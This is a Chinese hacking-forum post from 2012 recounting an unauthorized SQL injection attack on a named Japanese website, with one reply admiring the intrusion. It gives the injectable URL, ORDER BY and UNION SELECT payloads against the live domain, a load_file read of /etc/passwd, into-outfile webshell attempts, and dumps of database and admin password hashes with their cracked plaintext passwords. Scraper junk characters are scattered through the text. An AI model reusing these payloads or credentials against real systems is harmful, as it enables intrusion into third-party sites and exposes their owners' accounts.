找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创 检测汉奸站全过程
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 3591|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
xiancda
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
补:www.zuaa.jp测试
7 ?  u9 h- n0 C* U
2 L# }% x. z% z/ F( }( e' k# a
0x01. 检测 www.zuaa.jp 收集数据+ r/ l0 U1 e7 N: {7 F

8 a% v4 j; R- i+ V, P  j  r, \/ i) c3 V/ D% Y0 z$ |
whatweb
8 C# n. V; y( K% r
; ]! T1 a; g/ b+ H) w; u; `* p! a; V6 S' ]2 e
利用NMAP扫描6 M* {: ~% Q2 b/ X, B
; Q& y, M$ `" ^- {0 Z
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持/ C$ N& v  J5 ]1 c: E: L! p
0x02.找注入点
& f9 o. K, c" P) r- O' u& j找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=3907 A4 q- h" [3 ]; p0 U

1 ]# u$ E( y; g9 {1 W6 f7 T+ r0 y& {. R: S
0x03.order by
+ O/ x5 w9 t& V             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1& _! v* P% y4 t4 r1 ~# ]5 H4 j( z, v
* ^8 l5 G3 k9 T1 i
order by 28报错,order by 27正常
6 s" ~' h0 Q+ c! B6 L+ Y$ A0 }6 g5 ]
0x04.   union手动查询
+ A9 M2 v+ N* w' ^. I. R- V1 zhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 4 b8 ?& x, w  m- N+ {
添加到 27 时正常显示 ! I# d2 i9 ^; F- L& W2 R3 T8 m9 \
: \/ X" V/ F: n' o; l& y
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
8 t* n( j# P* f2 y" z5 i" d/ s
# E( M# a0 }1 p5 c0 F/ t0 Z% C0x05. info:+ ~0 |2 Y  G: _2 S
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 : Y8 W8 {3 S0 P- G' X& H, s1 g1 B# m
4 g# g7 N% `* ?7 ~
user:            root@localhost' d  M9 v' Z; ?* E5 ^0 m3 ]( K) ]
database:    openpne
5 w  W* Y0 r0 E1 f8 wversion:      4.1.227 c5 p& C5 ^- e$ H& O+ M& Z+ a7 D
os:             portbld-freebsd5.4* N) V9 c) e/ h( V2 y- t+ V' `
: C4 E- q; f3 ]9 z/ O  J* G- q/ _' O5 p
0x06. root用户! [$ W* M7 S( ~$ y, d+ x
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)2 Y* p3 _& Y  z; D# f+ k) ~* s/ B
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
6 b' C1 g3 F* C$ T+ S* V2 ?1 }; b+ W
通过工具转换
5 n5 D3 @6 j8 X- }7 K
8 r" V' W; @# F7 ]" x中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
4 y0 G& i0 X( K% |4 Q% V& P2 z" {$ b& E$ M4 p  Z9 S! K1 |
0x07. 利用 into outfile3 r5 e, H* r* U4 e( L% }
全部都失败  D! K7 O+ S, `! C
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php, b& J: G2 S" x2 {+ H: q8 O
7 H7 F- z- R( Q
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php 7 T0 v, p. z5 B& ]) ~- k

+ w' D( ^: q7 _" g9 O页面显示“MDB2 Error:syntax error”
% f1 h6 D8 u0 C2 D7 T, N# E) u2 k# J5 \
0x08. 利用 mysql 4.1* I5 p( f- T; a3 C2 w* o; W. U; K
猜常规表名,字段未果 工具 sqlmap7 A! R* X6 Z- O' d
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
! ~8 z; E0 Y: M) C6 i4 b) g  A0 ]+ h$ J+ I" r) O
. g, u# _2 M9 @9 B
8 D) @$ ~  h/ o( D' H
0x09. 查找后台6 m7 z( k( Z) _( Q5 b% _2 o
利用 现有的各种 后台工具尝试都不行
3 R% X2 n/ T; h$ T' C, J; G( L. L$ ~# A+ g; H
0x10.  MySL外联方法0 u# {. k- o8 \% C. w
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
4 B* u. y& F5 X( O可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
" P6 \% n$ Q+ \# t$ Zhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user1 f( l& B5 v  r0 y# n
2 v8 J7 f! X" Y- L( h
这个可以在 www.cmd5.com 解密
% N4 N' Q6 b! K& j: Sroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
4 i% ^0 ]& ^6 r$ fchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
" J% e/ o' P$ }7 ^! eopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
. `" f+ w9 w- a* Mzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
! B& i# U- a0 ?! d4 q* |/ S工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
% x6 n$ o! }3 ^0 q$ K4 n, J' R/ v# K  H, V, M2 L9 m

" ~0 p' X# U) @1 m0x11. 网站突破
" I1 ]4 r# I: @: }5 l/ Y0 o发现网站的源程序 openpne, google 下载 openpne 源码
) \: d4 h) A, J8 }5 X" A! x8 H4 A. U: \( L  t: I
( g4 C1 Z) v8 ~$ B6 G
0x12. 默认信息利用
9 ]' z$ d4 S: Hhttp://sns.zuaa.jp/?m=admin&a=page_login
+ s2 @. ]- E% T* r% |# d5 Y& w) [: H9 S$ f
表名 (c_admin_user) ,字段名(username,password)6 [( U% c% e4 L& Q5 F. E
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
+ }, M) x( e7 ^3 V
' n6 d  a2 H6 i& C5 k* _解密6 V  @3 ~/ N* x6 f0 x
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa20099 d$ H  i. k* U: }
zuaajp:c0923ec5857796a393da99905008c176,          zju18970 Q7 l& ?! h! D" V/ p8 J

9 ?' L, c' M7 ^+ N中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
) J2 J) p1 M- i
% b: `# B8 Y, U' i$ w; u# I3 }0x13. 登录后台7 Y/ I( c4 R9 T- N, G* h7 u1 O: {

2 \( R% i9 n" o1 k* W+ T% c! }( `- `- r* w  W/ n6 N

0 j' M4 Z* m% R/ p0x14. 小结
; T9 O' S' L5 C# q, u; H利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。; Q) C9 b* |% L' K5 Q! j  h
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点. f( Y2 u9 l7 t
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain: H3 s$ O2 [; Z! F+ c& p0 c5 @
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持- @: L% C0 d9 a$ @0 x9 P5 U

% _: A0 O  V' a3 w' C1 y, z最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
+ K8 W1 g- n1 u" h# N1 c& Q/ W1 b+ r

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

荒村狂客
沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表